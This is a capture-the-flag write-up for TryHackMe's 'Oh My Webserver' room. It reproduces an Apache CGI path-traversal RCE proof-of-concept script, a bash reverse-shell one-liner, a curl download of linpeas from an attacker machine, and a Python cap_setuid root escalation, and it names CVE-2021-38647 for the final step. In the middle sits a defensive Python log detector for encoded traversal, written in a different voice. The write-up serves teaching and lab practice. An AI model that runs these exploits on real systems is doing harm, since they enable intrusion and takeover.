Oh My Webserver — Writeup

Rishabh Rai
4 min read · Mar 5, 2022


LINK TO THE ROOM : https://tryhackme.com/room/ohmyweb

My Target IP :

Let’s run a quick recon on the Target IP

nmap -p- --min-rate 1000

Strange, I am getting port 80 as closed.

This is something I learned in a CTF: try the knock command (port knocking) to see whether the port opens.

and it worked!

Running a detailed scan on the discovered port.

nmap -p 80,22 -sCV -oN nmap_initial -Pn

Note the version of the web server.

Started directory brute-forcing on the web server.

There is an error which might be exploitable but we don’t know for sure.

So let’s use the most powerful tool in CyberSec that is GOOGLE.

On googling for an exploit for the web server version that is running, I found:


#!/bin/bash
# Usage: ./PoC.sh targets.txt <path> [command]
# Both the target list and the path are required; bail out if either is missing.
if [[ $1 == '' ]] || [[ $2 == '' ]]; then
echo ./PoC.sh targets.txt /etc/passwd
exit 1
fi
for host in $(cat "$1"); do
echo "$host"
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"
done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

First copy this exploit and save it as exploit.sh, then create a targets.txt file containing "http://<TARGET_IP>":

chmod +x exploit.sh

echo 'http://<TARGET_IP>' > targets.txt

bash exploit.sh targets.txt /bin/sh "<command>"

Now that we have RCE, let's get a reverse shell.

bash exploit.sh targets.txt /bin/bash "bash -i >& /dev/tcp/ 0>&1"
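As a defender's counterpart to the PoC above, here is an added example (my own code, not from the room or the PoC's author) that scans Apache access-log lines for the percent-encoded dot segments (.%2e, %2e%2e, and double-encoded %252e) the traversal relies on; the log lines are constructed samples.

```python
import re
from urllib.parse import unquote
# Constructed Apache combined-format access-log lines (sample data, not from the room).
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Mar/2022:10:00:07 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1301 "-" "curl/7.79.1"
10.0.0.9 - - [05/Mar/2022:10:00:12 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 22 "-" "curl/7.79.1"
10.0.0.7 - - [05/Mar/2022:10:00:20 +0000] "GET /images/../index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})')


def climbs_above_root(path: str) -> bool:
    """True if the '..' segments of an already-decoded path walk above the document root."""
    depth = 0
    for seg in path.split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ('', '.'):
            depth += 1
    return False


def analyze_path(raw_path: str):
    """Return a reason string if the request path is a traversal attempt, else None."""
    raw = raw_path.split('?', 1)[0].lower()
    decoded = raw
    for _ in range(3):  # peel nested encodings (%252e -> %2e -> .) before checking segments
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    if not climbs_above_root(decoded):
        return None  # '/images/../index.html' stays inside the docroot and is not flagged
    if decoded.split('/').count('..') > raw.split('/').count('..'):
        return 'percent-encoded dot segments escape the document root'
    return 'plain dot-dot traversal escapes the document root'


def detect_traversal(log_text: str) -> list:
    """Return (ip, method, raw_path, reason) for every suspicious request line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format
        reason = analyze_path(m['path'])
        if reason:
            hits.append((m['ip'], m['method'], m['path'], reason))
    return hits
```

The check separates a benign in-docroot `../` from one that climbs above the root, which is exactly what the vulnerable normalization missed. On the server side the fix is upgrading httpd to a release with corrected path normalization and keeping the default `Require all denied` on `<Directory />`, so files outside the document root are refused even if a request slips through.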

What is the user flag?

To get root in the Docker container, I downloaded linpeas and executed it:

curl http://<attacker_ip>:<port>/linpeas.sh -o linpeas.sh

chmod +x linpeas.sh && ./linpeas.sh > out.txt

On reading the linpeas output I found something interesting in the capabilities.


cap_setuid can be exploited with:

/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

cat /root/user.txt

What is the root flag?

For further enumeration I executed linpeas again.


Didn't find much in linpeas, except this IP, so I thought of scanning it. For that I will have to get nmap on the box, so let's get nmap.

How to get an nmap executable which you can transfer and run:

GIT HUB LINK: https://github.com/andrew-d/static-binaries

Now let's run a Python server here and transfer the binary to the shell.

chmod +x nmap_

let’s run this :

./nmap_ -p- --min-rate 1000

(We know the IP to scan from linpeas's output.)

Port 5986 seems interesting; let's google whether there is an exploit for it.

Unauthenticated RCE: CVE-2021-38647



THERE YOU HAVE IT! Room is completed


LINK TREE: https://linktr.ee/RishabhRai


